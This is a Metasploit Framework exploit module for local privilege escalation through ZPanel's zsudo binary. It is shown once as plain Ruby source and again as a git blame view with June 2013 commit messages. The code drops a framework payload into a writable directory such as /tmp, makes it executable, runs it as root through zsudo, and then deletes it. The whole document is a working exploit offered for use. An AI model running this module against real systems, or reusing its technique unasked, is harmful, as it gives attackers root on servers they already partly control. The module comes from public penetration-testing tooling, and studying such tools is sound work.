metasploit-framework/modules/exploits/linux/local/zpanel_zsudo.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/exe'


class Metasploit4 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Msf::Exploit::EXE
	include Msf::Post::File
	include Msf::Post::Common

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'ZPanel zsudo Local Privilege Escalation Exploit',
				'Description'   => %q{
					This module abuses the zsudo binary, installed with zpanel, to escalate
					privileges. In order to work, a session with access to zsudo on the sudoers
					configuration is needed. This module is useful for post exploitation of ZPanel
					vulnerabilities, where typically web server privileges are acquired, and this
					user is allowed to execute zsudo on the sudoers file.
				},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'sinn3r', 'juan vazquez' ],
				'DisclosureDate' => 'Jun 07 2013',
				'Platform'      => [ 'unix', 'linux'],
				'Arch'          => [ ARCH_CMD, ARCH_X86 ],
				'SessionTypes'  => [ 'shell', 'meterpreter' ],
				'Targets'       =>
					[
						[ 'Command payload', { 'Arch' => ARCH_CMD } ],
						[ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
					],
				'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
				'DefaultTarget' => 0,
			}
			))
		register_options([
				# These are not OptPath becuase it's a *remote* path
				OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
				OptString.new("zsudo",        [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),
			], self.class)
	end

	def check
		if file?(datastore["zsudo"])
			return CheckCode::Detected
		end

		return CheckCode::Unknown
	end

	def exploit
		if (target.arch.include? ARCH_CMD)
			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"
			# Using this way of writing the payload to avoid issues when failing to find
			# a command on the victim for writing binary data
			cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
		else
			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
			write_file(exe_file, generate_payload_exe)
		end

		cmd_exec "chmod +x #{exe_file}"

		print_status("Running...")

		begin
			cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"
		ensure
			cmd_exec "rm -f #{exe_file}"
		end

	end
end
Add local privilege escalation for ZPanel zsudo abuse 2013-06-23 16:00:39 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/common'`
			`require 'msf/core/post/file'`
			`require 'msf/core/post/linux/priv'`
			`require 'msf/core/exploit/exe'`


			`class Metasploit4 < Msf::Exploit::Local`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::EXE`
			`include Msf::Post::File`
			`include Msf::Post::Common`

			`def initialize(info={})`
			`super( update_info( info, {`
			`'Name' => 'ZPanel zsudo Local Privilege Escalation Exploit',`
			`'Description' => %q{`
			`This module abuses the zsudo binary, installed with zpanel, to escalate`
			`privileges. In order to work, a session with access to zsudo on the sudoers`
			`configuration is needed. This module is useful for post exploitation of ZPanel`
			`vulnerabilities, where typically web server privileges are acquired, and this`
			`user is allowed to execute zsudo on the sudoers file.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'sinn3r', 'juan vazquez' ],`
			`'DisclosureDate' => 'Jun 07 2013',`
			`'Platform' => [ 'unix', 'linux'],`
			`'Arch' => [ ARCH_CMD, ARCH_X86 ],`
			`'SessionTypes' => [ 'shell', 'meterpreter' ],`
			`'Targets' =>`
			`[`
			`[ 'Command payload', { 'Arch' => ARCH_CMD } ],`
			`[ 'Linux x86', { 'Arch' => ARCH_X86 } ]`
			`],`
			`'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },`
			`'DefaultTarget' => 0,`
			`}`
			`))`
			`register_options([`
			`# These are not OptPath becuase it's a remote path`
			`OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),`
			`OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),`
			`], self.class)`
			`end`

			`def check`
			`if file?(datastore["zsudo"])`
			`return CheckCode::Detected`
			`end`

			`return CheckCode::Unknown`
			`end`

			`def exploit`
			`if (target.arch.include? ARCH_CMD)`
Make random strings also length random 2013-06-24 17:01:30 +00:00			`exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"`
Add local privilege escalation for ZPanel zsudo abuse 2013-06-23 16:00:39 +00:00			`# Using this way of writing the payload to avoid issues when failing to find`
			`# a command on the victim for writing binary data`
			`cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"`
			`else`
Make random strings also length random 2013-06-24 17:01:30 +00:00			`exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"`
Add local privilege escalation for ZPanel zsudo abuse 2013-06-23 16:00:39 +00:00			`write_file(exe_file, generate_payload_exe)`
			`end`

			`cmd_exec "chmod +x #{exe_file}"`

			`print_status("Running...")`

			`begin`
Make random strings also length random 2013-06-24 17:01:30 +00:00			`cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"`
Add local privilege escalation for ZPanel zsudo abuse 2013-06-23 16:00:39 +00:00			`ensure`
			`cmd_exec "rm -f #{exe_file}"`
			`end`

			`end`
			`end`